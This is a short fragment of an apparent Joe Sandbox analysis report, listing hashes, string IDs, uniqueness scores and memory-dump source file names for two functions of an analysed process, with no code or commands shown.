                                                                                                • String ID: +$-
                                                                                                • API String ID: 1302938615-2137968064
                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                • Instruction ID: 2b34ca65708358c18a1c9253c244877ac5fae46f22afe2ee8932bf7275da074e
                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                • Instruction Fuzzy Hash: B791A171E0021A9BDB24DE6BC880ABEB7A5FF46724F144F1AEC55E72C4E770E9408761
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $$@
                                                                                                • API String ID: 0-1194432280
                                                                                                • Opcode ID: 912a3b3c624a173dccf7be49c4cddf93d901238aa522dc7f5c1e8f6f00775615
                                                                                                • Instruction ID: 89c01281d988955e040b7619b6b1aa2874279e2a5476c39448d6a255236cd566
                                                                                                • Opcode Fuzzy Hash: 912a3b3c624a173dccf7be49c4cddf93d901238aa522dc7f5c1e8f6f00775615
                                                                                                • Instruction Fuzzy Hash: C8812EB1D002699FDB358B54CC44BEAB6B8AB44754F0046EAE919F7280D774AE84CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%